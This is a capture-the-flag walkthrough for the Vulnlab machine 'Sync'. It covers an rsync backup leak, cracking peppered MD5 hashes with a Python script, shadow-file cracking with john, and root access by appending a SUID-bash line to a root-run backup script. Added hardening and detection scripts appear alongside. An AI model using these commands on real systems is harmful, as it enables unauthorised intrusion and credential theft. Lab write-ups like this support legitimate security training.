Sync VL

NMAP Scanning:

└─$ nmap -A -sC -sV -p21,22,80,873 10.10.110.93 -Pn                                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-10 13:36 EST
Nmap scan report for 10.10.110.93
Host is up (0.041s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 1b:97:60:11:e9:dd:3d:1d:ce:18:d3:ca:12:e5:13:fb (ECDSA)
|_ 256 84:94:57:1a:0c:0d:90:ec:27:f9:65:fb:a0:85:39:f2 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Login
873/tcp open rsync (protocol version 31)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.11 (93%), Linux 3.2 - 4.9 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 39.90 ms 10.8.0.1
2 40.07 ms 10.10.110.93

FTP - Checking:

└─$ ftp sync.vl                                                                      
Connected to sync.vl.
220 (vsFTPd 3.0.5)
Name (sync.vl:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp>
ftp> exit
221 Goodbye.

RSYNC - Checking:

List shares: rsync -av --list-only rsync://$IP

Listing a shared folder: rsync -av --list-only rsync://$IP/$FOLDER

Copying files from the shared folder: rsync -av rsync://$IP/$SHARE ./rsync_share

└─$ rsync -av --list-only rsync://10.10.110.93
httpd web backup

Copying the files from the folders:

└─$ rsync -av rsync://10.10.110.93/httpd httpd/  
receiving incremental file list
./
db/
db/site.db
migrate/
www/
www/dashboard.php
www/index.php
www/logout.php

HTTP - Directory Listing:

└─$ wfuzz -u http://sync.vl/FUZZ.php -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 31
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://sync.vl/FUZZ.php
Total requests: 220559

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000003: 200 25 L 60 W 1392 Ch "# Copyright 2007 James Fisher"
000000007: 200 25 L 60 W 1392 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000001: 200 25 L 60 W 1392 Ch "# directory-list-2.3-medium.txt"
000000015: 200 25 L 60 W 1392 Ch "index"
000000009: 200 25 L 60 W 1392 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 200 25 L 60 W 1392 Ch "# on at least 2 different hosts"
000000008: 200 25 L 60 W 1392 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000011: 200 25 L 60 W 1392 Ch "# Priority ordered case-sensitive list, where entries were found"
000000006: 200 25 L 60 W 1392 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000014: 403 9 L 28 W 272 Ch "http://sync.vl/.php"
000000010: 200 25 L 60 W 1392 Ch "#"
000000013: 200 25 L 60 W 1392 Ch "#"
000000005: 200 25 L 60 W 1392 Ch "# This work is licensed under the Creative Commons"
000000004: 200 25 L 60 W 1392 Ch "#"
000000002: 200 25 L 60 W 1392 Ch "#"
000001225: 302 0 L 0 W 0 Ch "logout"
000002927: 302 0 L 0 W 0 Ch "dashboard"

DB - Dumping & cracking users' passwords:

└─$ sqlite3 site.db      
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
users
sqlite> select * from users;
1|admin|7658a2741c9df3a97c819584db6e6b3c
2|triss|a0de4d7f81676c3ea9eabcadfd2536f6
sqlite>

Unfortunately we can't crack these hashes directly: their format is unknown, and neither john nor hashcat recognizes it. So we need to look at how the hash is created in the PHP login code:

<?php
session_start();
// Static application "pepper": one hard-coded secret shared by every user.
$secure = "6c4972f3717a5e881e282ad3105de01e";

if (isset($_SESSION['username'])) {
    header('Location: dashboard.php');
    exit();
}

if (isset($_POST['username']) && isset($_POST['password'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    // Unsalted MD5 over "secret|username|password": once $secure is known, a wordlist run is cheap.
    $hash = md5("$secure|$username|$password");
    $db = new SQLite3('../db/site.db');
    // User input is interpolated straight into the SQL string rather than bound as a parameter.
    $result = $db->query("SELECT * FROM users WHERE username = '$username' AND password= '$hash'");
    $row = $result->fetchArray(SQLITE3_ASSOC);
    if ($row) {
        $_SESSION['username'] = $row['username'];
        header('Location: dashboard.php');
        exit();
    } else {
        $error_message = 'Invalid username or password.';
    }
}

So, feeding this data to DeepSeek, it was able to craft me a Python script that creates the hashes and brute-forces them using rockyou.txt:

└─$ cat brute.py 
import hashlib

# Define the secure string (the static pepper from the PHP login code) and the target hashes
secure = "6c4972f3717a5e881e282ad3105de01e"
target_hashes = {
    "admin": "7658a2741c9df3a97c819584db6e6b3c",
    "triss": "a0de4d7f81676c3ea9eabcadfd2536f6"
}

# Path to the rockyou.txt wordlist
wordlist_path = "/usr/share/wordlists/rockyou.txt"

# Function to generate the hash exactly as the login does: md5("secure|username|password")
def generate_hash(username, password):
    combined = f"{secure}|{username}|{password}"
    return hashlib.md5(combined.encode()).hexdigest()

# Function to brute-force the hashes (stops at the first match)
def brute_force_hashes():
    with open(wordlist_path, 'r', encoding='latin-1') as wordlist:
        for password in wordlist:
            password = password.strip()
            for username, target_hash in target_hashes.items():
                generated_hash = generate_hash(username, password)
                if generated_hash == target_hash:
                    print(f"Found match: Username: {username}, Password: {password}")
                    return

    print("No matches found.")

if __name__ == "__main__":
    brute_force_hashes()

→ output of the script:

└─$ python3 brute.py 
Found match: Username: triss, Password: gerald

Now, with those credentials, we can try to connect via FTP and SSH, since we saw that the web portal doesn't let us do much:

└─$ ftp sync.vl                                                                                                     
Connected to sync.vl.
220 (vsFTPd 3.0.5)
Name (sync.vl:kali): triss
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||17383|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||53979|)
150 Here comes the directory listing.
drwxr-x--- 2 1003 1003 4096 Apr 21 2023 .
drwxr-x--- 2 1003 1003 4096 Apr 21 2023 ..
lrwxrwxrwx 1 0 0 9 Apr 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 1003 1003 220 Apr 19 2023 .bash_logout
-rw-r--r-- 1 1003 1003 3771 Apr 19 2023 .bashrc
-rw-r--r-- 1 1003 1003 807 Apr 19 2023 .profile
226 Directory send OK.
ftp>

And we can see that we have access to triss's home folder. With this in mind, we can create a .ssh folder and put our public key in it in order to connect via SSH.

triss@ip-10-10-200-238:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.04
DISTRIB_CODENAME=jammy
DISTRIB_DESCRIPTION="Ubuntu 22.04.2 LTS"
PRETTY_NAME="Ubuntu 22.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.2 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy

Using the password we cracked for triss, we can also switch to the user jennifer:

triss@ip-10-10-200-238:/tmp$ su - jennifer
Password:
jennifer@ip-10-10-200-238:~$ ls -lah
total 24K
drwxr-x--- 2 jennifer jennifer 4.0K Apr 21 2023 .
drwxr-xr-x 7 root root 4.0K Apr 19 2023 ..
lrwxrwxrwx 1 root root 9 Apr 21 2023 .bash_history -> /dev/null
-rw-r--r-- 1 jennifer jennifer 220 Apr 19 2023 .bash_logout
-rw-r--r-- 1 jennifer jennifer 3.7K Apr 19 2023 .bashrc
-rw-r--r-- 1 jennifer jennifer 807 Apr 19 2023 .profile
-rw-r--r-- 1 jennifer jennifer 37 Apr 19 2023 user.txt
jennifer@ip-10-10-200-238:~$ cat user.txt
VL{bcf845cf94864fbba7e016d9fcd3a2db}

In the filesystem root we can see a /backup folder containing some strange zip files. Extracting one of them reveals the following content:

jennifer@ip-10-10-200-238:/tmp$ unzip 1739211482.zip 
Archive: 1739211482.zip
creating: tmp/backup/
inflating: tmp/backup/rsyncd.conf
creating: tmp/backup/httpd/
creating: tmp/backup/httpd/www/
inflating: tmp/backup/httpd/www/dashboard.php
inflating: tmp/backup/httpd/www/logout.php
inflating: tmp/backup/httpd/www/index.php
creating: tmp/backup/httpd/migrate/
creating: tmp/backup/httpd/db/
inflating: tmp/backup/httpd/db/site.db
inflating: tmp/backup/passwd
inflating: tmp/backup/shadow

Now we have the passwd and shadow files. We can combine them with unshadow and crack the users' hashes with John the Ripper:

┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/sync.vl]
└─$ unshadow passwd shadow > unshadow

┌──(kali㉿kali)-[~/Desktop/Workspace/Vulnlab/sync.vl]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt unshadow
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sakura (sa)
gerald (jennifer)
gerald (triss)

So let’s switch to the sa user using the password sakura and run linpeas in order to find privilege escalation vectors:

╔══════════╣ .sh files in path
https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
You own the script: /usr/local/bin/backup.sh
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh

And we can see an interesting backup script:

sa@ip-10-10-200-238:/tmp/...$ cat /usr/local/bin/backup.sh 
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
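
Assuming, as the writeup does next, that root runs this script, the root cause is that the file is owned by and writable for a low-privileged user; the fixed /tmp/backup staging path and an archive of /etc/shadow created with default permissions are the other two weak spots. The following hardened variant is an added example, not the box's own script; it assumes GNU coreutils (stat -c) and uses tar in place of zip.

```shell
#!/bin/sh
# Hardened backup.sh (added example, not the box's own script). It fixes three
# weaknesses of the original: it refuses to run from a file that is not owned by
# the invoking user or is writable by anyone else, it stages in an unpredictable
# mktemp directory instead of the fixed /tmp/backup, and it creates the archive
# with mode 0600 so a copy of /etc/shadow is not readable by other users.
# Assumes GNU coreutils (stat -c) and uses tar instead of zip.

# Return 0 if FILE is owned by the current user and not group/world writable.
script_is_trusted() {
    file="$1"
    owner=$(stat -c '%u' "$file" 2>/dev/null) || return 1
    [ "$owner" -eq "$(id -u)" ] || return 1
    mode=$(stat -c '%A' "$file" 2>/dev/null) || return 1
    case "$mode" in
        ?????w*|????????w*) return 1 ;;  # group (char 6) or other (char 9) write bit
    esac
    return 0
}

# make_backup DEST_DIR SRC... : copy SRC paths into a private staging directory,
# archive them as DEST_DIR/<epoch>.tar.gz with mode 0600 and print the archive path.
make_backup() {
    dest_dir="$1"; shift
    stage=$(mktemp -d) || return 1
    if ! cp -r -- "$@" "$stage"/; then
        rm -rf -- "$stage"; return 1
    fi
    archive="$dest_dir/$(date +%s).tar.gz"
    # umask in a subshell so the caller's umask is left untouched
    if ! ( umask 077 && tar -czf "$archive" -C "$stage" . ); then
        rm -rf -- "$stage"; return 1
    fi
    rm -rf -- "$stage"
    printf '%s\n' "$archive"
}

# Entry point: backup.sh DEST_DIR SRC...  (e.g. /backup /opt/httpd /etc/passwd
# /etc/shadow /etc/rsyncd.conf). With no arguments only the functions are defined.
main() {
    if ! script_is_trusted "$0"; then
        echo "refusing to run: $0 is not owned by $(id -un) or is writable by others" >&2
        return 1
    fi
    make_backup "$@"
}
[ "$#" -eq 0 ] || main "$@"
```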

We can assume that root executes this script (it reads /etc/shadow and writes to /backup), so let's modify it so we can get a root shell:

sa@ip-10-10-200-238:/tmp/...$ echo 'cp /bin/bash /tmp/bash_root && chmod 4755 /tmp/bash_root' >> /usr/local/bin/backup.sh 
sa@ip-10-10-200-238:/tmp/...$ cat /usr/local/bin/backup.sh
#!/bin/bash

mkdir -p /tmp/backup
cp -r /opt/httpd /tmp/backup
cp /etc/passwd /tmp/backup
cp /etc/shadow /tmp/backup
cp /etc/rsyncd.conf /tmp/backup
zip -r /backup/$(date +%s).zip /tmp/backup
rm -rf /tmp/backup
cp /bin/bash /tmp/bash_root && chmod 4755 /tmp/bash_root

sa@ip-10-10-200-238:/tmp/...$ ls -lah /tmp
total 1.4M
drwxrwxrwt 15 root root 4.0K Feb 10 19:12 .
drwxr-xr-x 20 root root 4.0K Feb 10 18:17 ..
drwxrwxr-x 2 sa sa 4.0K Feb 10 19:05 ...
drwxrwxrwt 2 root root 4.0K Feb 10 18:17 .ICE-unix
drwxrwxrwt 2 root root 4.0K Feb 10 18:17 .Test-unix
drwxrwxrwt 2 root root 4.0K Feb 10 18:17 .X11-unix
drwxrwxrwt 2 root root 4.0K Feb 10 18:17 .XIM-unix
drwxrwxrwt 2 root root 4.0K Feb 10 18:17 .font-unix
-rw-r--r-- 1 jennifer jennifer 5.8K Feb 10 18:59 1739211482.zip
-rwsr-xr-x 1 root root 1.4M Feb 10 19:12 bash_root
drwx------ 3 root root 4.0K Feb 10 18:17 snap-private-tmp
drwx------ 3 root root 4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-apache2.service-bsejjE
drwx------ 3 root root 4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-chrony.service-031XHP
drwx------ 3 root root 4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-systemd-logind.service-7zbwkj
drwx------ 3 root root 4.0K Feb 10 18:17 systemd-private-5924f26320a14ec2a34d5774c143fbc3-systemd-resolved.service-aNYEQb
drwxrwxr-x 3 jennifer jennifer 4.0K Feb 10 18:59 tmp
drwx------ 2 sa sa 4.0K Feb 10 19:05 tmux-1001

sa@ip-10-10-200-238:/tmp/...$ /tmp/bash_root -p
bash_root-5.1# whoami
root
bash_root-5.1# cd /root
bash_root-5.1# ls -lah
total 44K
drwx------ 6 root root 4.0K Apr 21 2023 .
drwxr-xr-x 20 root root 4.0K Feb 10 18:17 ..
lrwxrwxrwx 1 root root 9 Apr 20 2023 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3.1K Oct 15 2021 .bashrc
drwxr-xr-x 2 root root 4.0K Apr 20 2023 .deploy
-rw------- 1 root root 20 Apr 20 2023 .lesshst
drwxr-xr-x 3 root root 4.0K Apr 19 2023 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw-r--r-- 1 root root 66 Apr 19 2023 .selected_editor
drwx------ 2 root root 4.0K Apr 19 2023 .ssh
-rw-r--r-- 1 root root 37 Apr 19 2023 root.txt
drwx------ 4 root root 4.0K Apr 19 2023 snap
bash_root-5.1# cat root.txt
VL{1ce8506d2bec0abb03177353db237e1b}
bash_root-5.1#
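
The /tmp listing above shows the artefact this technique leaves behind: a root-owned copy of bash with the set-uid bit in a world-writable directory. The helper below is an added detection example, not part of the writeup; it reports set-uid/set-gid files under the given directories that are missing from a baseline allowlist (one absolute path per line; the baseline file and its contents are assumed).

```shell
#!/bin/sh
# Detection helper (added example): report set-uid/set-gid regular files under the
# given directories that are not listed in a baseline file (one absolute path per
# line). Run periodically over /tmp, /var/tmp and /dev/shm, or over / against a
# baseline taken from a known-good image, a 4755 copy of bash shows up immediately.

# Print set-uid or set-gid regular files under DIR..., sorted and de-duplicated.
find_setid_files() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort -u
}

# unexpected_setid_files BASELINE_FILE DIR... : print set-id files under DIR...
# that are absent from BASELINE_FILE. Returns 0 if none, 1 if any, 2 if the
# baseline file cannot be read.
unexpected_setid_files() {
    baseline="$1"; shift
    [ -r "$baseline" ] || return 2
    # grep -F -x: whole-line literal match; -v keeps the paths NOT in the baseline.
    found=$(find_setid_files "$@" | grep -vxF -f "$baseline" || true)
    [ -n "$found" ] || return 0
    printf '%s\n' "$found"
    return 1
}

[ "$#" -eq 0 ] || unexpected_setid_files "$@"
```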